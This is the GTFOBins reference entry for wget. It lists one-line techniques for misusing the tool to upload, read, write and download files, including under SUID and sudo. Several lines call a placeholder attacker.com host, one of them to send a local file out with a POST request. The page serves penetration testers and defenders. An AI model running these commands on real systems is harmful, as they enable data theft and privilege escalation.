GTFOBins.github.io/_gtfobins/wget.md
2021-05-15 19:21:30 +02:00

1.6 KiB

functions
file-upload file-read file-write file-download suid sudo
description code
Send local file with an HTTP POST request. Run an HTTP service on the attacker box to collect the file. Note that the file will be sent as-is, instruct the service to not URL-decode the body. Use `--post-data` to send hard-coded data. URL=http://attacker.com/ LFILE=file_to_send wget --post-file=$LFILE $URL
description code
The file to be read is treated as a list of URLs, one per line, which are actually fetched by `wget`. The content appears, somewhat modified, as error messages, thus this is not suitable to read arbitrary binary data. LFILE=file_to_read wget -i $LFILE
description code
The data to be written is treated as a list of URLs, one per line, which are actually fetched by `wget`. The data is written, somewhat modified, as error messages, thus this is not suitable to write arbitrary binary data. LFILE=file_to_write TF=$(mktemp) echo DATA > $TF wget -i $TF -o $LFILE
description code
Fetch a remote file via HTTP GET request. URL=http://attacker.com/file_to_get LFILE=file_to_save wget $URL -O $LFILE
description code
Fetch a remote file via HTTP GET request. URL=http://attacker.com/file_to_get LFILE=file_to_save ./wget $URL -O $LFILE
description code
Fetch a remote file via HTTP GET request. URL=http://attacker.com/file_to_get LFILE=file_to_save sudo wget $URL -O $LFILE